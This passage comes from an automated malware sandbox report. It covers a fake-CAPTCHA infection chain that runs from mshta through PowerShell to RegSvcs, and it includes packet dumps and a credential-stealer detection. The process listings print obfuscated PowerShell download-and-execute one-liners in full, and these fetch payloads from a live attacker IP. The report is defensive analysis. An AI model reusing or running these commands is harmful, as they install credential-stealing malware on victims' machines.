                                                                                                                                                        Data Ascii: v4cAQAAGyh+AQAGEQcgwKQx9logQs7CIWE4Lf7//34BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMF0AEAABsoegEABihwAgAGEQUomQIABhMGfgEAAAQCEQYWEQQaWSh+AQAGEQalAQAAGwsRByC6SCe+WiCnDg/PYTin/f//Bm4Xai4IIG4xC0clKwYg17l+
                                                                                                                                                        Jan 15, 2025 10:18:38.884313107 CET1289INData Raw: 43 4a 41 41 41 41 54 51 49 41 41 4a 77 41 41 41 43 43 41 67 41 41 75 41 41 41 41 41 55 41 41 41 43 64 41 67 41 41 51 41 41 41 41 42 6f 41 41 41 41 6d 41 51 41 41 7a 51 45 41 41 48 6b 42 41 41 41 4d 41 51 41 41 4a 51 49 41 41 47 63 43 41 41 41 34
                                                                                                                                                        Data Ascii: CJAAAATQIAAJwAAACCAgAAuAAAAAUAAACdAgAAQAAAABoAAAAmAQAAzQEAAHkBAAAMAQAAJQIAAGcCAAA4mAIAAAIfHmQKEQcgVxnlPlog6ErzJWErjX4BAAAEAgkW/hwBAAAbKH4BAAYRByAXY2dZWiBuyGoSYThn////KEgCAAZ+AQAABAIIKBsCAAYoVAEABqUBAAAbCxEHILR9cCJaIEI1r+5hODj///8GbhdqLggg0bDfY
                                                                                                                                                        Jan 15, 2025 10:18:38.884433031 CET1289INData Raw: 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 46 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 6d 4a 67 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 38 51 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 68 69 59
                                                                                                                                                        Data Ascii: BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYAwRByB0jl0OWiCgpCRYYTjj/v//fgEAAAQCCRb+HAEAABsofgEABhEHIK0RFAxaILc72TNhOL3+//8oSAIABn4BAAAEAggoGwIABihUAQAGpQEAABsLEQcg0swPhlogHwvpSmE4jv7//xEGpQEAABsLEQcgLHwLR1
                                                                                                                                                        Jan 15, 2025 10:18:38.884550095 CET1289INData Raw: 45 51 77 67 42 79 37 44 54 31 6f 67 61 71 49 41 56 32 45 34 56 76 37 2f 2f 78 45 49 4b 43 45 42 41 41 59 6f 76 67 41 41 42 6f 41 44 41 41 41 45 45 51 77 67 68 5a 79 54 32 46 6f 67 32 2b 72 76 67 57 45 34 4d 76 37 2f 2f 77 6b 4a 48 77 31 6b 59 51
                                                                                                                                                        Data Ascii: EQwgBy7DT1ogaqIAV2E4Vv7//xEIKCEBAAYovgAABoADAAAEEQwghZyT2Fog2+rvgWE4Mv7//wkJHw1kYQ0JCR8ZYmENIA7JG8I4Gv7//xYTChEMILl3cUBaINb3SAthOAT+//8RBx8JEQcfCZUIHwmVYZ4RBx8KEQcfCpUIHwqVYZ4RBx8LEQcfC5UIHwuVYZ4RBx8MEQcfDJUIHwyVYZ4RBx8NEQcfDZUIHw2VYZ4RBx8OEQc
                                                                                                                                                        Jan 15, 2025 10:18:38.884617090 CET1289INData Raw: 41 41 45 4b 68 4d 77 42 77 44 58 41 51 41 41 42 77 41 41 45 51 4e 37 43 51 41 41 42 42 38 4c 5a 41 4a 37 42 51 41 41 42 46 6f 4b 41 33 73 49 41 41 41 45 42 6b 46 33 41 51 41 41 48 45 55 42 41 41 41 41 39 76 2f 2f 2f 78 63 74 42 74 41 6a 41 41 41
                                                                                                                                                        Data Ascii: AAEKhMwBwDXAQAABwAAEQN7CQAABB8LZAJ7BQAABFoKA3sIAAAEBkF3AQAAHEUBAAAA9v///xctBtAjAAAGJiBsqaeFIPxTwoFhJQsfCl5FCgAAAD8BAABoAQAAw////2YAAAAFAAAABwEAAMoAAABaAAAAmwAAACcBAAA4YwEAAAMGfQkAAAQCJXsFAAAEIAAIAAACewUAAARZG2RYfQUAAAQDewkAAAQgAAAAATcSGkUBAAAA
                                                                                                                                                        Jan 15, 2025 10:18:39.118865967 CET1289INData Raw: 31 61 49 43 45 6f 4d 59 78 68 4b 35 6f 57 43 78 59 4d 45 51 51 67 74 50 74 53 68 56 6f 67 39 68 6e 41 46 57 45 72 68 67 4a 37 42 67 41 41 42 41 62 67 6a 77 49 41 41 41 49 44 4b 43 4d 41 41 41 59 6c 4a 67 30 67 64 49 42 37 4f 6a 68 6d 2f 2f 2f 2f
                                                                                                                                                        Data Ascii: 1aICEoMYxhK5oWCxYMEQQgtPtShVog9hnAFWErhgJ7BgAABAbgjwIAAAIDKCMAAAYlJg0gdIB7Ojhm////CBdYDBEEINoskJpaIKigttJhOE////8IAnsHAAAELwggNbXAeCUrBiAu4cABJSY4Mv///wcqABMwBwDQAAAACQAAERcKFgsWDDiYAAAAIF92nCIgxxIvUGElEwQdXkUHAAAAz////yIAAABKAAAABQAAAJIAAAA2A


                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.11.204976992.255.57.1204436112C:\Windows\System32\mshta.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-15 09:18:36 UTC362OUTGET /recaptcha-verify.html HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                                                                                        UA-CPU: AMD64
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                        Host: view-reserve.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-15 09:18:37 UTC262INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 15 Jan 2025 09:18:36 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 31911
                                                                                                                                                        Last-Modified: Sun, 12 Jan 2025 14:57:08 GMT
                                                                                                                                                        Connection: close
                                                                                                                                                        ETag: "6783d844-7ca7"
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        2025-01-15 09:18:37 UTC16122INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
                                                                                                                                                        2025-01-15 09:18:37 UTC15789INData Raw: 71 53 0f 5a 43 4e 45 55 32 53 13 63 77 54 2b 53 17 7f 6d 59 7a 64 4e 4e 53 1c 4e 7c 59 71 53 75 53 20 4b 52 4e 55 53 24 78 71 58 14 4e 59 55 33 4e 5b 4f 75 4a 72 53 2c 4e 09 4f 5c 27 59 1a 62 3f 4e 63 53 34 4e 65 61 5b 70 68 53 38 4e 69 60 71 4e 6c 61 66 74 0b 53 3e 63 52 4e 71 49 23 5e 34 59 33 4e 75 57 71 54 35 5a 15 53 47 4f 75 61 7a 4f 78 4e 50 5c 5c 51 59 42 63 52 4a 1c 59 14 62 2d 4d 03 59 4a 4d 06 59 7e 4d 08 5c 5c 0f 4e 1f 60 18 4a 3c 5c 5c 1e 4d 5c 72 60 1e 4d 0f 69 37 4d 11 59 5c 5c 4c 69 59 60 4d 16 53 67 4d 19 59 68 60 35 49 30 4d 1f 58 07 53 73 59 07 53 76 61 1a 4d 25 50 5e 53 7a 4d 28 59 7a 53 7f 52 47 4f 7e 4d 2f 55 09 52 06 61 30 52 08 4d 35 52 0b 60 63 58 0c 79 51 60 67 4d 3a 58 11 4d 3c 59 0e 58 15 52 17 53 1c 60 76 52 1b 64 79 4b 1e 7f
                                                                                                                                                        Data Ascii: qSZCNEU2ScwT+SmYzdNNSN|YqSuS KRNUS$xqXNYU3N[OuJrS,NO\'Yb?NcS4Nea[phS8Ni`qNlaftS>cRNqI#^4Y3NuWqT5ZSGOuazOxNP\\QYBcRJYb-MYJMY~M\\N`J<\\M\r`Mi7MY\\LiY`MSgMYh`5I0MXSsYSvaM%P^SzM(YzSRGO~M/URa0RM5R`cXyQ`gM:XM<YXRS`vRdyK


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.11.204977323.47.27.744439116C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-15 09:18:41 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                        2025-01-15 09:18:42 UTC1917INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Date: Wed, 15 Jan 2025 09:18:42 GMT
                                                                                                                                                        Content-Length: 25929
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: sessionid=d2b040e0738eb66764a685b0; Path=/; Secure; SameSite=None
                                                                                                                                                        Set-Cookie: steamCountry=US%7C5914350094a33e2d53260db908a94a71; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                        2025-01-15 09:18:42 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                        2025-01-15 09:18:42 UTC10109INData Raw: 3f 6c 3d 6a 61 70 61 6e 65 73 65 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6a 61 70 61 6e 65 73 65 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e6 97 a5 e6 9c ac e8 aa 9e 20 28 4a 61 70 61 6e 65 73 65 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09
                                                                                                                                                        Data Ascii: ?l=japanese" onclick="ChangeLanguage( 'japanese' ); return false;"> (Japanese)</a><a class="popup_menu_item tight" href="?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a>
                                                                                                                                                        2025-01-15 09:18:42 UTC1353INData Raw: 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 69 6d 61 67 65 73 2f 73 6b 69 6e 5f 31 2f 66 6f 6f 74 65 72 4c 6f 67 6f 5f 76 61 6c 76 65 2e 70 6e 67 3f 76 3d 31 22 20 77 69 64 74 68 3d 22 39 36 22 20 68 65 69 67 68 74 3d 22 32 36 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 56 61 6c 76 65 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 54 65 78 74 22 3e 0a 09 09 09 09 09 26 63 6f 70 79 3b 20 56 61 6c 76 65 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 41 6c 6c 20 74 72 61 64 65 6d 61 72 6b 73 20 61 72 65 20 70 72 6f 70
                                                                                                                                                        Data Ascii: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1" width="96" height="26" border="0" alt="Valve Logo" /></span><span id="footerText">&copy; Valve Corporation. All rights reserved. All trademarks are prop


                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:04:18:34
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1"
                                                                                                                                                        Imagebase:0x7ff6c09b0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:1
                                                                                                                                                        Start time:04:18:34
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6743c0000
                                                                                                                                                        File size:875'008 bytes
                                                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:04:18:34
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html
                                                                                                                                                        Imagebase:0x7ff7a0e80000
                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:4
                                                                                                                                                        Start time:04:18:36
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                                                        Imagebase:0x7ff6c09b0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:5
                                                                                                                                                        Start time:04:18:36
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6743c0000
                                                                                                                                                        File size:875'008 bytes
                                                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:6
                                                                                                                                                        Start time:04:18:36
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                                                        Imagebase:0x7ff6c09b0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:04:18:36
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6743c0000
                                                                                                                                                        File size:875'008 bytes
                                                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:04:18:36
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                                                        Imagebase:0x7ff7f7b00000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:04:18:37
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6743c0000
                                                                                                                                                        File size:875'008 bytes
                                                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:04:18:38
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                        File size:45'984 bytes
                                                                                                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:04:18:39
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                        Imagebase:0x590000
                                                                                                                                                        File size:45'984 bytes
                                                                                                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:12
                                                                                                                                                        Start time:04:18:39
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                        Imagebase:0x630000
                                                                                                                                                        File size:45'984 bytes
                                                                                                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:13
                                                                                                                                                        Start time:04:18:39
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                        Imagebase:0x380000
                                                                                                                                                        File size:45'984 bytes
                                                                                                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:14
                                                                                                                                                        Start time:04:18:39
                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                        Imagebase:0x460000
                                                                                                                                                        File size:45'984 bytes
                                                                                                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00007FFB4C8533B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.58262271906.00007FFB4C850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffb4c850000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f7b784197025fde0e1c1f41fb264ee87d323bcb4f61a4d527f39ad22688a8d80
                                                                                                                                                          • Instruction ID: ce8e334a73f59ff3bab80226743fd6881376d291fdc90919fdf24cb1ac575b04
                                                                                                                                                          • Opcode Fuzzy Hash: f7b784197025fde0e1c1f41fb264ee87d323bcb4f61a4d527f39ad22688a8d80
                                                                                                                                                          • Instruction Fuzzy Hash: 9A01677111CB0C4FD748EF0CE451AB6B7E0FB95324F50056EE58AC3661DA36E892CB45

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00000250DC912F14 Relevance: .5, Instructions: 532COMMON
